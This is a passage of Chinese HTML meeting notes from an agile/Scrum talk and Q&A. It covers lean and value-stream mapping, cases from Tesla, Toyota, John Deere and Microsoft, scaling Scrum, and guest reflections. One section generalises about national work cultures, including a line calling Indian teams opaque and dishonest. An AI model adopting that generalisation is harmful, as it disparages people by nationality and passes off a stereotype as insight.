style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;color: black;font-size: 12px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12px;">增加创新：敏捷允许更快的迭代和实验，从而产生更有创意的解决方案和产品。</span></p></li></ul><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;">总体而言，约翰迪尔采用敏捷方法论帮助他们在产品开发流程中变得更加敏捷、响应迅速和以客户为中心。</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;" lang="en-US"><span style="font-size: 12px;">---</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;">在采用敏捷方法之前，约翰迪尔在产品开发过程中面临了一些挑战。他们采用传统的瀑布式方法来进行产品开发，导致不同部门之间出现了隔阂，决策速度较慢。他们的产品导致了长时间的时间领先和不总是与客户需求对齐。</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;">为了解决这些问题，约翰迪尔开始在产品开发流程中采用敏捷方法。他们首先组建了包括工程、设计、制造和市场营销等不同部门代表的跨职能团队。这些团队以更为迭代和协作的方式共同开发产品，并在过程中考虑到客户和利益相关者的反馈。</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;">敏捷方法的一个重要优势是它的持续改进和学习的关注。约翰迪尔能够及早并经常从客户和利益相关者那里收集反馈，并使用这些信息实时改进他们的产品。这使他们能够更好地应对市场需求和客户需求的变化。</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;">敏捷还强调团队合作和协作的重要性。通过打破不同部门之间的隔阂，约翰迪尔能够改善沟通并培养跨职能合作的文化。这使他们能够更有效地工作，缩短了开发新产品所需的时间。</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;">敏捷还帮助约翰迪尔更好地管理风险和不确定性。通过使用迭代方法，在投入大量资源开发产品之前测试和完善想法。这有助于减轻失败的风险，并确保他们的产品满足客户需求。</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;">总体而言，约翰迪尔采用敏捷方法已经帮助他们在产品开发流程中变得更加灵活、以客户为中心和高效。通过打破隔阂、促进协作和优先考虑客户需求，他们已能够更快地成功推出新产品。</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;"> </span></p></td></tr></tbody></table><p><br/></p><h1 style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:16.0pt;color:#14324D;"><span lang="zh-CN">嘉宾和</span><span lang="en-US">Jeff</span><span lang="zh-CN">互动环节</span></h1><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
Calibri;" lang="yo">Sw &amp; hw</span><span style="font-family:微软雅黑;" lang="yo">在应用精益</span><span style="font-family:微软雅黑;" lang="zh-CN">、</span><span style="font-family:微软雅黑;" lang="en-US">vsm</span><span style="font-family:微软雅黑;" lang="yo">的区别</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">软件在提交代码之后的流程，才更像</span><span lang="en-US">toyota</span><span lang="zh-CN">精益要优化的环节，更容易自动化。</span><span lang="en-US">c</span><span lang="yo">ode之前的</span><span lang="zh-CN">环节</span><span lang="yo">，idea，需求、规划，架构，很主观，</span><span lang="zh-CN">产生了规划文件、架构设计、源代码，这些要进行精益优化、</span><span lang="en-US">vsm</span><span lang="yo">是难的。这</span><span lang="zh-CN">两个</span><span lang="yo">阶段性的区别怎么处理？</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">Jeff</span><span lang="zh-CN">回应：时代变了，软件、硬件互为师徒，完成轮换。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:微软雅黑;" lang="yo">scrum的源头是lean，</span><span style="font-family:微软雅黑;" lang="en-US">scrum</span><span style="font-family:微软雅黑;" lang="zh-CN">是</span><span style="font-family:微软雅黑;" lang="yo">向最好的硬件公司学习</span><span style="font-family:微软雅黑;" lang="zh-CN">得来的</span><span style="font-family:微软雅黑;" lang="yo">。</span><span style="font-family:Calibri;" lang="yo">20</span><span style="font-family:微软雅黑;" lang="yo">年以前，软件的更新</span><span style="font-family:微软雅黑;" lang="zh-CN">就</span><span style="font-family:微软雅黑;" lang="yo">比硬件更快</span><span style="font-family:微软雅黑;" lang="zh-CN">，所以我们需要调整，要敏捷。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:微软雅黑;" lang="zh-CN">现在情况又有变化，最好的硬件厂商，一些</span><span style="font-family:微软雅黑;" lang="yo">美国战斗机生产</span><span style="font-family:微软雅黑;" lang="zh-CN">商认为，</span><span style="font-family:微软雅黑;color:red;" lang="yo">所有的硬件都是软件</span><span style="font-family:微软雅黑;" lang="yo">，</span><span style="font-family:微软雅黑;" lang="zh-CN">一开始在</span><span style="font-family:Calibri;" lang="en-US">C</span><span style="font-family:Calibri;" lang="yo">AD</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">，后续是在</span><span style="font-family:Calibri;" lang="en-US">C</span><span style="font-family:Calibri;" lang="yo">AE</span><span style="font-family:微软雅黑;" lang="yo">上</span><span style="font-family:微软雅黑;" lang="zh-CN">模拟</span><span style="font-family:微软雅黑;" lang="yo">，可以了再投入生产。好多部件是</span><span style="font-family:Calibri;" lang="yo">3D</span><span style="font-family:微软雅黑;" lang="yo">打印的，也是软件控制的。</span><span style="font-family:
微软雅黑;" lang="zh-CN">现在是硬件的思维模式</span><span style="font-family:微软雅黑;" lang="en-US">mindeset</span><span style="font-family:微软雅黑;" lang="zh-CN">需要改变，硬件就是软件！</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:微软雅黑;" lang="zh-CN">特斯拉，生产线上一周</span><span style="font-family:Calibri;" lang="en-US">20</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">个变更，</span><span style="font-family:微软雅黑;" lang="zh-CN">多个团队设计同一个组件，新组件上线后，团队进行交替。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:微软雅黑;" lang="yo">生产、</span><span style="font-family:Calibri;" lang="yo">VSM,</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">、</span><span style="font-family:微软雅黑;" lang="yo">软件的区别和界限慢慢分不清了。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">软硬件的区别变模糊，生产的车都不一样，车也要大量的自动化回归测试，产出的车子才安全。</p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:微软雅黑;" lang="yo">案例，丰田欧洲，</span><span style="font-family:Calibri;" lang="yo">200</span><span style="font-family:微软雅黑;" lang="yo">人</span><span style="font-family:微软雅黑;" lang="zh-CN">的团队</span><span style="font-family:微软雅黑;" lang="yo">，</span><span style="font-family:Calibri;" lang="yo">5</span><span style="font-family:微软雅黑;" lang="yo">年，由于复杂政治原因，一事无成，效率</span><span style="font-family:Calibri;" lang="yo">0.2</span><span style="font-family:微软雅黑;" lang="yo">%。</span><span style="font-family:微软雅黑;" lang="en-US">Jeff</span><span style="font-family:微软雅黑;" lang="zh-CN">将拆分团队，团队变小，团队</span><span style="font-family:
微软雅黑;" lang="en-US">20</span><span style="font-family:微软雅黑;" lang="zh-CN">人</span><span style="font-family:微软雅黑;" lang="yo">，不仅是改善，还需要团队改变，组织架构变化，团队变小。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;" lang="yo"><span style="font-family:微软雅黑;">丰田感想：</span><span style="font-family:Calibri;color:red;">SCRUM</span><span style="font-family:
微软雅黑;color:red;">不仅仅是改善，而且是革命性的组织变革</span><span style="font-family:微软雅黑;">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">软件创造所有东西，思维定势要改，硬件按照软件的速度来改。硬件要学习软件的组件化交付。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="yo">制造业sop之前和之后不一样，越来越像了。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">Tesla，软件之前和软件之后，</span><span style="color:red;" lang="yo">软件是所有步骤的成分之一</span><span lang="yo">，</span><span style="color:red;" lang="yo">软件</span><span style="color:red;" lang="zh-CN">分量</span><span style="color:red;" lang="yo">越来越</span><span style="color:red;" lang="zh-CN">重</span><span lang="yo">，</span><span lang="zh-CN">软件做：</span><span lang="yo">检查，分析，质控，安全。</span></p><p><br/></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary=""><tbody><tr><td style="border-style: solid;border-color: rgb(163, 163, 163);border-width: 1pt;background-color: rgb(231, 231, 231);vertical-align: top;padding: 4pt;" width="652.3333333333334"><p style="margin:0in;font-size:11.0pt;color:black;"><span style="font-size: 12px;"><span style="font-family: &#34;微软雅黑 Light&#34;;">特斯拉为什么能在生产线上进行</span><span style="font-family: Calibri;">20</span><span style="font-family: &#34;微软雅黑 Light&#34;;">次改变？多个团队如何设计相同的零件并快速发布，他们如何计划同一零件的不同团队之间的变更？</span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-size:11.0pt;color:black;"><span style="font-size: 12px;"><span style="font-family: &#34;微软雅黑 Light&#34;;">特斯拉可以在生产线上进行</span><span style="font-family: Calibri;">20</span><span style="font-family: &#34;微软雅黑 Light&#34;;">次改变，是因为它采用了先进的制造技术，如自动化和模块化设计。这使得他们能够快速重新配置装配线，并实施变更，而不会影响整个生产过程。</span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;">为了使多个团队设计相同的零件并快速发布，特斯拉可能使用敏捷开发方法、清晰的沟通渠道和强大的版本控制系统的组合。这些实践有助于确保不同的团队都朝着共同的目标努力，并且变更得到正确跟踪和记录，以便无缝集成到整个项目中。</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;">为了规划在设计同一零件的不同团队之间进行变更，特斯拉可能使用产品路线图和项目管理软件等工具来协调努力并跟踪进度。通过将复杂的项目分解成更小、更易管理的任务，他们可以确保每个人都在朝着相同的目标努力。此外，定期会议和检查可以帮助确保在开发过程的早期发现任何问题或差异。</span></p></td></tr></tbody></table><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;">实施大规模敏捷的挑战</h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">不同敏捷团队，实施效果不一样。有些新组织是一开始就敏捷，有些需要经历敏捷转型。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">扩张快，新人越来越多，越来越多的</span><span lang="en-US">sm</span><span lang="zh-CN">，但是他们的思维模式不一定对</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;color: red;"><span lang="en-US">scrum at scale</span><span lang="zh-CN">，启动时要小，结果清晰，慢慢扩张</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:微软雅黑;color:red;" lang="zh-CN">只有高层有正确的敏捷思维模式，敏捷才能持续下来，这需要十几年的时间（如微软），需要有恒心，有时候要换</span><span style="font-family:Calibri;color:red;" lang="en-US">CEO</span><span style="font-family:微软雅黑;" lang="zh-CN">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">rocket
mortgage</span><span lang="zh-CN">的例子：</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:Calibri;" lang="yo">SAFE</span><span style="font-family:微软雅黑;" lang="yo">，</span><span style="font-family:Calibri;" lang="yo">2500</span><span style="font-family:微软雅黑;" lang="yo">人</span><span style="font-family:微软雅黑;" lang="zh-CN">增长到</span><span style="font-family:Calibri;" lang="en-US">4</span><span style="font-family:Calibri;" lang="yo">000</span><span style="font-family:微软雅黑;" lang="yo">人，效率翻倍，但是还不够快</span><span style="font-family:微软雅黑;" lang="zh-CN">，</span><span style="font-family:微软雅黑;" lang="en-US">rocket</span><span style="font-family:微软雅黑;" lang="zh-CN">认为还可以更快。</span><span style="font-family:微软雅黑;" lang="yo">前端，</span><span style="font-family:微软雅黑;" lang="zh-CN">面向客户，</span><span style="font-family:微软雅黑;" lang="yo">改变最快</span><span style="font-family:微软雅黑;" lang="zh-CN">。以前是</span><span style="font-family:微软雅黑;" lang="en-US">Quarter release</span><span style="font-family:微软雅黑;" lang="zh-CN">，现在是</span><span style="font-family:微软雅黑;" lang="en-US">daily release</span><span style="font-family:
微软雅黑;" lang="zh-CN">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;" lang="yo"><span style="font-family:微软雅黑;">要</span><span style="font-family:Calibri;">scrum @ scale</span><span style="font-family:微软雅黑;">，</span></p><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">每个团队</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">都要实践</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">s</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">crum</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">每个人多技能</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">每个团队有sm</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">增效</span><span style="font-family:
     Calibri;font-size:11.0pt;">4</span><span style="font-family:微软雅黑;font-size:11.0pt;">倍</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">推广到全公司</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">John
Deere</span><span lang="zh-CN">的</span><span lang="en-US">IT</span><span lang="zh-CN">团队的</span><span lang="en-US">SCRUM</span><span lang="zh-CN">也做得不好，但是他们不是瓶颈。采购团队才是瓶颈，采购好了，采取改善</span><span lang="en-US">IT</span><span lang="zh-CN">的</span><span lang="en-US">scrum</span><span lang="zh-CN">。取得</span><span lang="en-US">15</span><span lang="zh-CN">倍的改进，关键不是</span><span lang="en-US">IT</span><span lang="zh-CN">部门。</span></p><p><br/></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary="" style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><tbody style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><tr style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><td style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" width="652.3333333333334"><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">微软的敏捷转型成功故事始于2000年代初，当时该公司看到了需要改善其软件开发流程。当时，微软在长时间的开发周期、延迟发布和缺乏创新方面遇到了困难。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">为了解决这些问题，微软开始采用Scrum和Kanban等敏捷方法。它从小处着手，只有一些团队试验敏捷方法，但随着时间推移，这种方法被证明是成功的，并开始在整个组织中传播。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">微软敏捷转型的关键因素之一是高层领导接受变革并投资必要的培训和资源的意愿。微软还密切与外部咨询师和领域专家合作，帮助指导其向敏捷转型。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">尽管取得了这些进展，微软仍然用了十多年的时间才完成其敏捷转型。这部分原因是由于组织的规模庞大和其软件开发流程的复杂性。这还需要进行重大的文化转变，员工需要适应新的工作和协作方式。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">总体而言，微软敏捷转型的成功证明了领导承诺、文化认同和持续投资于培训和资源的重要性。虽然这可能是一个漫长而具有挑战性的过程，但敏捷方法的好处最终可以导致更大的创新、更快的上市时间和改善的客户满意度。</span></p></td></tr></tbody></table><p><br/></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
微软雅黑;" lang="zh-CN">中国本地化实施</span><span style="font-family:Calibri;" lang="en-US">SCRUM</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">的</span><span style="font-family:微软雅黑;" lang="zh-CN">挑战</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">每个国家都有他特定的问题</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">美国：牛仔文化，谁都很强，个人主义，谁也不服谁，大家很难同步。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">印度：不透明、不诚实，开头说得好好好的，最后一刻变卦。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">中国：中国过渡</span><span lang="zh-CN">微观</span><span lang="yo">管理年轻员工，micro management，开发人员非常好，管理的问题很严重。</span><span style="color:red;" lang="yo">中国管理团队参加敏捷培训后，要创造自己的敏捷方法论，以便</span><span style="color:red;" lang="zh-CN">继续微观领导、深度</span><span style="color:red;" lang="yo">控制员工</span><span lang="yo">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;color: red;">中国最大的挑战，领导层是否有开放的态度，拥抱敏捷，绩效才能爆发</p><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;">竖井如何改成敏捷、跨职能团队</h2><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">竖井团队是传统</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">最重要的客户</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">真的</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">要什么，vsm是什么，怎么组织</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">的？</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">案例，游戏公司</span></p></li><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">更新太慢，市场份额下降，游戏产品太多</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">看vsm，想法到上</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">线</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">要2年</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">减少产品，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">一个</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">敏捷团队只关注一个</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">游戏</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">产品</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">有些团队</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">发布周期从2年变成8周。</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">每个人都必须是、愿意是跨职能的，这能能极大消除竖井</span></p></li><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">设计师：设计做完之后，贡献什么？测试、编码</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">几百人的公司，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">3</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">年</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">scrum</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">经验。</span></p></li><ul type="disc" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">Q</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">A经理，原来管住自己的测试人员。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">测试串行执行，测试安排在最后做，来回交接需要好几周，</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">效率差25倍。1个小时能解决的事情，可能要花好几天</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">（配置环境、复现，但是</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">code</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">改了，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">…</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">）</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">测试要加入团队，否则炒掉</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">QA Manager</span></p></li></ul></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">vsm，是个有效的工具，能看到竖井，延迟在哪里？怎么提高效率</span></p></li></ul><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;">敏捷教练，内部培养教练，进行转型</h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">Scrum
master egg</span><span lang="zh-CN">，</span><span lang="en-US">sm</span><span lang="zh-CN">自己就必须是</span><span lang="en-US">coach</span><span lang="zh-CN">，培养新人。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">agile
coach</span><span lang="zh-CN">，</span><span lang="en-US">toyota</span><span lang="zh-CN">关联企业说，光培训还不够。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">John
Deere</span><span lang="zh-CN">也内建了敏捷培训组织，内部培养。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;" lang="yo"><span style="font-family:微软雅黑;">类似</span><span style="font-family:Calibri;">six sigma </span><span style="font-family:微软雅黑;">bb</span></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
Calibri;" lang="yo">scrum</span><span style="font-family:微软雅黑;" lang="yo">应用</span><span style="font-family:微软雅黑;" lang="zh-CN">，敏捷企业</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">如果企业都成功转型了，教练会失业么？</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">constant
contact</span><span lang="zh-CN">：</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">sm</span><span lang="zh-CN">变成了能团结所有人的人，可以做</span><span lang="en-US">bu</span><span lang="zh-CN">的头</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">后面可以做高管的培训师，高管也经常换人啊，需要教练</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;color: red;">让大家一起协作工作的能力，能让你的职业生涯无止境</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">敏捷最好的时代，业务，教育、政府，机会很大，创新机会很多</p><h1 style="margin:0in;font-family:微软雅黑;font-size:16.0pt;color:#14324D;">嘉宾分享感受</h1><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="yo">Jack Xu</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">scrum转型，激励，领导力，</span><span lang="zh-CN">很大的前提是</span><span lang="yo">大环境做好，scrum才能好</span><span lang="zh-CN">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">敏捷教练要懂运营管理，要能做事情</span><span lang="en-US"> </span><span lang="zh-CN">（不要清高），什么都要懂。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">能干活的敏捷教练很不容易找。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">领导也懂这些道理，各种利益、职位、历史、组织架构方向制约，领导可能认知到了，但是没有太多办法。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Lisa Wang</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">领导不支持，全白谈了，老版听懂了才行</span><span lang="en-US"> </span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">关键是领导听懂了，领导才能保证转型成功</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">最好是敏捷教练拉着领导来听课</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Glen Wang</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">敏捷逻辑，一个团队天生有多倍绩效的潜能。被压制住的原因是管理风格，这也是敏捷的开关。管理者要放弃命令与控制，转化成教练与支持，变成赋能的角色。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="color:
red;" lang="yo">敏捷和scrum是福音</span><span style="color:red;" lang="zh-CN">，传教士的心态和精神，要多喊一喊</span><span lang="zh-CN">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">TestOps</span><span lang="en-US"> </span><span lang="yo">云层</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">往前走，测试到敏捷测试，测试教练角色有很多机会</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">不要有测试团队，测试人员应该分散到团队中，专搞</span><span lang="en-US">QA</span><span lang="zh-CN">没有前途</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">每个人都可以是qa，每个人都是Qa，po、</span><span lang="zh-CN">开发</span><span lang="yo">等等</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" 